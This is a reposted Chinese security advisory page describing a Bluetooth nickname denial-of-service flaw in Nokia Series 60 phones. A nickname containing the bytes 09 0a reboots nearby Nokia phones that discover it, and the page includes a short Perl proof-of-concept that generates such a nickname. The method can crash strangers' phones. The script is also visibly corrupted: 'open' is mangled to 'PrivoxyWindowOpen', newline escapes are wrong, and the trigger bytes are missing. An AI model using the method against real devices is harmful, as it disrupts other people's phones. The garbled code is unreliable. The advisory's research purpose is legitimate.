 |
Nokia Symbian 60系列蓝牙昵称拒绝服务漏洞 |
|
|
| Nokia Symbian 60系列蓝牙昵称拒绝服务漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 9:20:32 |
|
受影响系统:
Nokia 60系列手机
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 12743
Nokia是世界上最大的手机生产商,60系列是其生产的一系列手机型号。
Nokia 60系列手机存在远程拒绝服务漏洞,攻击者可以利用此漏洞使受害的手机重启。
起因是操作系统不能处理畸形的网络数据。在使用蓝牙设备时,如果用户的昵称为16进制" 09 0a "的话,就可能导致其他搜索到该设备用户的Nokia手机重启。
导致重启的昵称如下:
[任意内容][16进制的09 0a][任意内容]
必须在09 0a前添加任意内容,因为nokia手机以为09 0a是末尾的空间,会将其删除。
<*来源:Qnix (Qnix@bsdmail.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111989132510547&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
nokia-bt-cx.pl
-------------start---------------
#!/usr/bin/perl -w
my $btnick;
my $bth;
my $bts;
my $file;
$bth = " .";
print "/n*******************************************************/n";
print "** NOKIA REMOTE RESTART IN BLUETOOTH NICKNAME **/n";
print "** BY QNIX | Q-nix[@]bsdmail[dot]org **/n";
print "*******************************************************/n";
print " /n write your nickname : ";
$btnick = <STDIN>;
chomp($btnick);
print " /n OUTPUT : ";
$file = <STDIN>;
chomp($file);
PrivoxyWindowOpen(BLUEN, ">>$file") || die "Could not create file $!/n";
$bts = "$btnick$bth";
print BLUEN ("$bts");
close(BLUEN);
print "/n Done !! , send the output to your nokia and copy the file to the bluetooth /
nickname space . /n/n";
-------------end-----------------
建议:
--------------------------------------------------------------------------------
厂商补丁:
Nokia
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.nokia.com【转自世纪安全网 http://www.21safe.com】
|
|
| 新闻录入:admin 责任编辑:admin |
|
|
上一篇新闻: MS05-035 Microsoft Word 中的漏洞可能允许远程执行代码 (903672)
下一篇新闻: 解决安装MSSQL或SP补丁挂起的方法 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
